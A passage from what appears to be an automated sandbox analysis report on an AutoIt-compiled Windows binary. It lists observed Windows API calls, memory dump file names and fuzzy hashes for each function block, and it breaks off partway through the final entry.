                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: CounterPerformanceQuerySleep
                                                                    • String ID:
                                                                    • API String ID: 2875609808-0
                                                                    • Opcode ID: 9e82d7ef020d4bfb2c0d7394460411eac9ff1ddd6f969f0014f7e1993c402245
                                                                    • Instruction ID: 578ff058107801af968531b796cff0464a582794d091bc6be8f3a9142e5d3884
                                                                    • Opcode Fuzzy Hash: 9e82d7ef020d4bfb2c0d7394460411eac9ff1ddd6f969f0014f7e1993c402245
                                                                    • Instruction Fuzzy Hash: DE111831D4161DD7CF10AFA5D848AEEBBB8FF4A711F044045EA81B2245CB7595508BD5
                                                                    APIs
                                                                    • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 0102D84D
                                                                    • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 0102D864
                                                                    • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 0102D879
                                                                    • RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 0102D897
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: Type$Register$FileLoadModuleNameUser
                                                                    • String ID:
                                                                    • API String ID: 1352324309-0
                                                                    • Opcode ID: fc303ac1e0fe00a8242cf115b6ab566186df7522417ec4adb66a8b6397d6bc49
                                                                    • Instruction ID: b32116e4f4bb975e3db2784229beee9c2070f75159f43ad651a944f8bbf25f31
                                                                    • Opcode Fuzzy Hash: fc303ac1e0fe00a8242cf115b6ab566186df7522417ec4adb66a8b6397d6bc49
                                                                    • Instruction Fuzzy Hash: 7B115E75605315DBE3208F90D808F97BBBCEB00B00F00856AE6DAD6040DBF5E9499FA1
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                    • String ID:
                                                                    • API String ID: 3016257755-0
                                                                    • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                    • Instruction ID: 2905b226278cd9e2e9f3127549766783849234290b2adebc4edb445b27a47b27
                                                                    • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                    • Instruction Fuzzy Hash: B5017E3604014EFBEF139E88CC05CED3F66BB28250F488555FA98580B0C23BE5B1AB81
                                                                    APIs
                                                                    • GetWindowRect.USER32(?,?), ref: 0105B2E4
                                                                    • ScreenToClient.USER32(?,?), ref: 0105B2FC
                                                                    • ScreenToClient.USER32(?,?), ref: 0105B320
                                                                    • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 0105B33B
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: ClientRectScreen$InvalidateWindow
                                                                    • String ID:
                                                                    • API String ID: 357397906-0
                                                                    • Opcode ID: 87b43ae2680569cee3aeaf3cb90912b351cceb10614ba4ed1fcf3f4dd2b8cd35
                                                                    • Instruction ID: 8261d0b2325986b9a98b5a0ae69aafd064608d22dd1c93b9f986bcdc34f72656
                                                                    • Opcode Fuzzy Hash: 87b43ae2680569cee3aeaf3cb90912b351cceb10614ba4ed1fcf3f4dd2b8cd35
                                                                    • Instruction Fuzzy Hash: 491144B9D0020AEFDB51DFA9C4849EEBBF9FF08210F108156E954E3214D735AA558F60
                                                                    APIs
                                                                    • _memset.LIBCMT ref: 0105B644
                                                                    • _memset.LIBCMT ref: 0105B653
                                                                    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,01096F20,01096F64), ref: 0105B682
                                                                    • CloseHandle.KERNEL32 ref: 0105B694
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: _memset$CloseCreateHandleProcess
                                                                    • String ID:
                                                                    • API String ID: 3277943733-0
                                                                    • Opcode ID: 9182c21723925d79c2525706431feaad014d06a1d47c3e15c2d2fbec9a2fb220
                                                                    • Instruction ID: 2dc6468220e9b1827839338a8bc29ee63f0f69194308ac484492d128392bd077
                                                                    • Opcode Fuzzy Hash: 9182c21723925d79c2525706431feaad014d06a1d47c3e15c2d2fbec9a2fb220
                                                                    • Instruction Fuzzy Hash: 76F05EB25403047AF7202765AC36FBB3A9CFB09395F404020BB88E5196D77F580097A8
                                                                    APIs
                                                                    • EnterCriticalSection.KERNEL32(?), ref: 01036BE6
                                                                      • Part of subcall function 010376C4: _memset.LIBCMT ref: 010376F9
                                                                    • _memmove.LIBCMT ref: 01036C09
                                                                    • _memset.LIBCMT ref: 01036C16
                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 01036C26
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: CriticalSection_memset$EnterLeave_memmove
                                                                    • String ID:
                                                                    • API String ID: 48991266-0
                                                                    • Opcode ID: 2bd287d405562da43b0ff6b27cf61ef700679d3430a9a2510ef583a9fe879b44
                                                                    • Instruction ID: b6aec92f8d32ce27fa58234310bd78398a8923f713942b6b1f2338738ca8995b
                                                                    • Opcode Fuzzy Hash: 2bd287d405562da43b0ff6b27cf61ef700679d3430a9a2510ef583a9fe879b44
                                                                    • Instruction Fuzzy Hash: 89F0547A100205ABCF016F55DC84A8ABB29EF45360F04C051FE099E226CB35E811DBB4
                                                                    APIs
                                                                      • Part of subcall function 00FD12F3: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00FD134D
                                                                      • Part of subcall function 00FD12F3: SelectObject.GDI32(?,00000000), ref: 00FD135C
                                                                      • Part of subcall function 00FD12F3: BeginPath.GDI32(?), ref: 00FD1373
                                                                      • Part of subcall function 00FD12F3: SelectObject.GDI32(?,00000000), ref: 00FD139C
                                                                    • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0105BD40
                                                                    • LineTo.GDI32(00000000,?,?), ref: 0105BD4D
                                                                    • EndPath.GDI32(00000000), ref: 0105BD5D
                                                                    • StrokePath.GDI32(00000000), ref: 0105BD6B
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                    • String ID:
                                                                    • API String ID: 1539411459-0
                                                                    • Opcode ID: 7ba896fd013eb2ad5d7d7353131c597df3869dbd70a8481326e3a3777f613bc5
                                                                    • Instruction ID: e5a744284678cd7b771aed224b4dae13f291e3fe532934d90e3658030ac23cab
                                                                    • Opcode Fuzzy Hash: 7ba896fd013eb2ad5d7d7353131c597df3869dbd70a8481326e3a3777f613bc5
                                                                    • Instruction Fuzzy Hash: F7F0BE3100125ABBDB222F55AC0DFCF3F99BF06311F084041FA90650D1877E1650CBA5
                                                                    APIs
                                                                    • GetSysColor.USER32(00000008), ref: 00FD2231
                                                                    • SetTextColor.GDI32(?,000000FF), ref: 00FD223B
                                                                    • SetBkMode.GDI32(?,00000001), ref: 00FD2250
                                                                    • GetStockObject.GDI32(00000005), ref: 00FD2258
                                                                    • GetWindowDC.USER32(?,00000000), ref: 0100BE83
                                                                    • GetPixel.GDI32(00000000,00000000,00000000), ref: 0100BE90
                                                                    • GetPixel.GDI32(00000000,?,00000000), ref: 0100BEA9
                                                                    • GetPixel.GDI32(00000000,00000000,?), ref: 0100BEC2
                                                                    • GetPixel.GDI32(00000000,?,?), ref: 0100BEE2
                                                                    • ReleaseDC.USER32(?,00000000), ref: 0100BEED
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                                    • String ID:
                                                                    • API String ID: 1946975507-0
                                                                    • Opcode ID: 13d5ce910927cd83229577e02de1f230bcc7c61d8cc34c6b06925b5dacb463f4
                                                                    • Instruction ID: 48d28528748cc687d6a73b5f638d8fb6c84152e832fc8808b40eed0aa917152c
                                                                    • Opcode Fuzzy Hash: 13d5ce910927cd83229577e02de1f230bcc7c61d8cc34c6b06925b5dacb463f4
                                                                    • Instruction Fuzzy Hash: F9E03932504245AAEB625F68E80DBDA3F11EB16336F0483A6FBA9580E5C77A4580DB12
                                                                    APIs
                                                                    • GetCurrentThread.KERNEL32 ref: 0102871B
                                                                    • OpenThreadToken.ADVAPI32(00000000,?,?,?,010282E6), ref: 01028722
                                                                    • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,010282E6), ref: 0102872F
                                                                    • OpenProcessToken.ADVAPI32(00000000,?,?,?,010282E6), ref: 01028736
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: CurrentOpenProcessThreadToken
                                                                    • String ID:
                                                                    • API String ID: 3974789173-0
                                                                    • Opcode ID: d45c60f7df67df7a28cf49653162ea179a76d613c7099fee8b4c374e98e8c3b2
                                                                    • Instruction ID: f2fb0aa587e2e2f9376d1fca6c8b6441049fe13b0a0101d7eb3ee6f434a003b5
                                                                    • Opcode Fuzzy Hash: d45c60f7df67df7a28cf49653162ea179a76d613c7099fee8b4c374e98e8c3b2
                                                                    • Instruction Fuzzy Hash: 4BE04F766113229BD7705EB45D0CB573BE8EF50791F048858F2C5CA084D62D80518750
                                                                    APIs
                                                                    • GetDesktopWindow.USER32 ref: 01011D5D
                                                                    • GetDC.USER32(00000000), ref: 01011D67
                                                                    • GetDeviceCaps.GDI32(00000000,0000000C), ref: 01011D87
                                                                    • ReleaseDC.USER32(?), ref: 01011DA8
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: CapsDesktopDeviceReleaseWindow
                                                                    • String ID:
                                                                    • API String ID: 2889604237-0
                                                                    • Opcode ID: a7719d11cde8fdc8975a591918a68f8bebe3fde636e4a031c7d0c1780ebeeda9
                                                                    • Instruction ID: 92526254c79afbe1fc3d5e127434ea6ebbea9fab1e3bb54cff8880befdcfaa87
                                                                    • Opcode Fuzzy Hash: a7719d11cde8fdc8975a591918a68f8bebe3fde636e4a031c7d0c1780ebeeda9
                                                                    • Instruction Fuzzy Hash: 66E0E575800206EFCF116FB0D80865E7BB2AB4C351F148016F99A97214DB7D8141AF50
                                                                    APIs
                                                                    • GetDesktopWindow.USER32 ref: 01011D71
                                                                    • GetDC.USER32(00000000), ref: 01011D7B
                                                                    • GetDeviceCaps.GDI32(00000000,0000000C), ref: 01011D87
                                                                    • ReleaseDC.USER32(?), ref: 01011DA8
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: CapsDesktopDeviceReleaseWindow
                                                                    • String ID:
                                                                    • API String ID: 2889604237-0
                                                                    • Opcode ID: 7cde9147826a2a35f3d76422bd81d4af5fa87da9aec8d7b17c79bbac11a21559
                                                                    • Instruction ID: 27868876b6aa06627e1608a6e1dd2ca672cf0c6053258b64535ac4f66fcca5f9
                                                                    • Opcode Fuzzy Hash: 7cde9147826a2a35f3d76422bd81d4af5fa87da9aec8d7b17c79bbac11a21559
                                                                    • Instruction Fuzzy Hash: 55E0E575800206AFCF215FB0C80865E7BB2AB4C351F148015F99997210DB7D9141AF50
                                                                    APIs
                                                                    • OleSetContainedObject.OLE32(?,00000001), ref: 0102B4BE
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: ContainedObject
                                                                    • String ID: AutoIt3GUI$Container
                                                                    • API String ID: 3565006973-3941886329
                                                                    • Opcode ID: 87490cfbff8c9f1f42498542e8be283f7f6ae328f84754348a96a6b28a2517f8
                                                                    • Instruction ID: 1500c06b7ad025ed92ac81360c37c5ad3f0b156adacd3e520531ab80d944b38f
                                                                    • Opcode Fuzzy Hash: 87490cfbff8c9f1f42498542e8be283f7f6ae328f84754348a96a6b28a2517f8
                                                                    • Instruction Fuzzy Hash: 6E915970600611AFDB54DF68C884B6ABBE9FF49710F20856DE98ACF6A1DB71E841CB50
                                                                    APIs
                                                                      • Part of subcall function 00FEFC86: _wcscpy.LIBCMT ref: 00FEFCA9
                                                                      • Part of subcall function 00FD9837: __itow.LIBCMT ref: 00FD9862
                                                                      • Part of subcall function 00FD9837: __swprintf.LIBCMT ref: 00FD98AC
                                                                    • __wcsnicmp.LIBCMT ref: 0103B02D
                                                                    • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 0103B0F6
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                                                    • String ID: LPT
                                                                    • API String ID: 3222508074-1350329615
                                                                    • Opcode ID: 0ef431911c2077fa56400662ea2254776254a8a7aebb6c3f8ff608daa9a6ea9b
                                                                    • Instruction ID: b3c5b00f08ab8f6b92416826cbdda3d4a6918ec1fbf23213e72e564cf8442470
                                                                    • Opcode Fuzzy Hash: 0ef431911c2077fa56400662ea2254776254a8a7aebb6c3f8ff608daa9a6ea9b
                                                                    • Instruction Fuzzy Hash: DD61B271E00219AFCB14EF98C891EAEB7F9EF48714F44409AF996AB351D774AE40CB50
                                                                    APIs
                                                                    • Sleep.KERNEL32(00000000), ref: 00FE2968
                                                                    • GlobalMemoryStatusEx.KERNEL32(?), ref: 00FE2981
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: GlobalMemorySleepStatus
                                                                    • String ID: @
                                                                    • API String ID: 2783356886-2766056989
                                                                    • Opcode ID: a814185717c1d819b000da3ec4b0fa4f0ade0ba7f52399d9eafc10abc06ec80e
                                                                    • Instruction ID: 28d5bf32084756cdbc1946fe3f9f5e9eac86869f0c97d1566ecebe1905e448ac
                                                                    • Opcode Fuzzy Hash: a814185717c1d819b000da3ec4b0fa4f0ade0ba7f52399d9eafc10abc06ec80e
                                                                    • Instruction Fuzzy Hash: 685166724087489BD320EF50DC86BAFBBF8FB85340F85884EF2D881195DB758529DB66
                                                                    APIs
                                                                      • Part of subcall function 00FD4F0B: __fread_nolock.LIBCMT ref: 00FD4F29
                                                                    • _wcscmp.LIBCMT ref: 01039824
                                                                    • _wcscmp.LIBCMT ref: 01039837
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: _wcscmp$__fread_nolock
                                                                    • String ID: FILE
                                                                    • API String ID: 4029003684-3121273764
                                                                    • Opcode ID: f55e06e08dc296587a336f80678be59339d89b4ec74b29a6a6094aeb456f621d
                                                                    • Instruction ID: 4b5e4e7643b719b8a33fe781c63a10fb33261be6c3f1717ecc9d8a07e647ff8c
                                                                    • Opcode Fuzzy Hash: f55e06e08dc296587a336f80678be59339d89b4ec74b29a6a6094aeb456f621d
                                                                    • Instruction Fuzzy Hash: DE41C571A0020ABBDF219BA4CC45FEFBBBDEFC5714F00006AF944A7290D6B5A9049B61
                                                                    APIs
                                                                    • _memset.LIBCMT ref: 0104259E
                                                                    • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 010425D4
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: CrackInternet_memset
                                                                    • String ID: |
                                                                    • API String ID: 1413715105-2343686810
                                                                    • Opcode ID: 883e48a927f8a978699aedb6072ef15ff8eebf760638ffd210d1b4607abe7fd9
                                                                    • Instruction ID: 3a692b65a2e415633c06a3a5eb49cd756b3344bf421f6c1b27436418e9389915
                                                                    • Opcode Fuzzy Hash: 883e48a927f8a978699aedb6072ef15ff8eebf760638ffd210d1b4607abe7fd9
                                                                    • Instruction Fuzzy Hash: 16315DB1900219EBCF01EFA5DC85EEEBFB9FF08340F04006AF954AA261EB355955DB50
                                                                    APIs
                                                                    • SendMessageW.USER32(?,00001132,00000000,?), ref: 01057B61
                                                                    • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 01057B76
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend
                                                                    • String ID: '
                                                                    • API String ID: 3850602802-1997036262
                                                                    • Opcode ID: 7ed050a88dee7a39b964c4d09496f2fecebb02adcdb66b7f1b0c0c95acd401c1
                                                                    • Instruction ID: 5cb2b737feffa5e3f3d0db2810c55fa47c7bb96803df1239d6e5437eb34abb6a
                                                                    • Opcode Fuzzy Hash: 7ed050a88dee7a39b964c4d09496f2fecebb02adcdb66b7f1b0c0c95acd401c1
